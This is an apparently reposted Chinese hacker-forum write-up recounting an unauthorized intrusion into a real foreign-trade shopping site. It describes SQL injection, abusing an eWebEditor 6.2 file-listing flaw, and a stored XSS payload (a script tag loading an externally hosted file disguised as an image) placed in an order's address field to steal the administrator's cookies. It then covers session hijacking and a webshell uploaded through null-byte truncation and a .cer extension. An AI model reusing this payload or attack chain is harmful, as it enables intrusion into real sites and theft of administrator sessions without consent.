xss简单渗透某外贸站

无聊,铞一外贸商城,ASP,有注入,铞出账号密码,直觉MD5加盐,查了,铞不出明文,后台也铞不出.有eweb6.2,可以列文件但列不出目录,求高人指点.

列文件:

思路:打算GOOGLE日一下同程序的站,拿源码,继续铞目标站.

找到一个程序大致一样的网站,铞之…eweb6.2列一下文件,狗运到,有程序备份在网站根目录.

下载回来以后,看了一下后台,都是蛮疯狂的目录名.目标站的后台扫描基本也放弃了.看了一下源码,发现后台是单纯的session验证admin是否为空.有一个上传,应该能直接%00截断上传,思路也大致出来了.

思路:优先挖掘能跨到后台的存储型XSS,盗取referer 和 cookies . 等管理员被XSS,应该就能记录后台地址,然后立刻趁管理员还没退出,SESSION还没挂掉,立刻替换他的COOKIE到自己那,上传得SHELL
找呀找,找呀找,找到订单提交的位置可以XSS到后台,管理员查看订单时就能触发.立马把前面的源码架设起来,测试一下.

测试没问题,马上铞目标站.马上填好订单,提交.address填上

<script src=https://static-js.b0.upaiyun.com/wp-content/uploads/auto_save_image/2012/09/1043076fI.jpg>

把盗referer和cookies的脚本传到空间. 剩下就是等管理员上线,每日每夜地刷新着TXT,等待cookies的来临,终于来了. 马上打开后台地址www.91ri.org /seyshomekjers/来到登陆界面,在URL上写,下面不是写错了

求神拜佛SESSION不要挂了;然后直接连接www.xxx.com/seyshomekjers/upload_pic.asp,没有跳转到登陆页,证明OK了,

抓包,上传,%00,上传不了ASA,ASP,不知道是怎么回事,应该是防火墙还是啥.上传CER成功解析,闪人,这些就不截图了.

其实大牛看了,应该觉得绕了远路了,没亮点,勿见怪.菜啊.

link:https://www.t00ls.net/thread-18438-1-2.html

91ri.org:简单的思路,10年的文章 拿出来分享一下 推荐一篇大神的xss文章《用xss平台沦陷百度投诉中心后台》希望大家喜欢。

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注名本站连接!